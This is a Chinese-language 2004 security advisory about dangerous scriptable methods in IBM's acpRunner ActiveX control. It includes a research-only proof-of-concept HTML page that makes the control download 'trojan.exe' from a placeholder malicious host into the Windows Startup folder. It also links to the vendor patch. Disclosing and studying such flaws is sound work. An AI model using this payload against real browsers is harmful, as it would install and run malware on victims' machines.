IBM ACPRunner ActiveX控件不安全调用方法漏洞
发布日期:2004-06-16
更新日期:2004-06-22
受影响系统:IBM acpRunner 1.2.5.0
描述:
BUGTRAQ ID:
10561
IBM "acpRunner"控件也是IBM用于自动维护PC的解决方案。
IBM "acpRunner"控件包含危险的调用方法,远程攻击者可以利用这个漏洞在目标用户系统上安装恶意程序。
IBM "acpRunner"控件可调用方法有"DownLoadURL"、"SaveFilePath"和"Download"接收文件名的变量,这些危险的调用可使用户下载恶意文件到用户硬盘中,包括启动文件夹。
利用这些方法,攻击者构建恶意页面,诱使用户点击,可导致恶意程序安装并执行。
<*来源:Eeye Digital Security
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=108745652205176&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Eeye Digital Security 提供了如下测试方法:
-----------EXAMPLE HTML---------
|object width="310" height="20"
codebase="
https://www-3.ibm.com/pc/support/access/aslibmain/content/AcpC
ontrol.cab" id="runner"
classid="CLSID:E598AC61-4C6F-4F4D-877F-FAC49CA91FA3"
data="DATA:application/x-oleobject;BASE64,YayY5W9MTU+Hf/rEnKkfowADAAAKIA
AAEQIAAA==">
|object|
|script|
runner.DownLoadURL = "
http://malicioussystem/trojan.exe";
runner.SaveFilePath = "\..\\Start Menu\\Programs\\Startup";
runner.FileSize = 96,857;
runner.FileDate = "01/09/2004 3:33";
runner.DownLoad();
|script|
---------------------------------
建议:
厂商补丁:
IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
IBM Upgrade access_support_fp2.exe
http://www-306.ibm.com/pc/support/site.wss/document.do?lndocid=MIGR-54588浏览次数:3388
严重程度:0(网友投票)
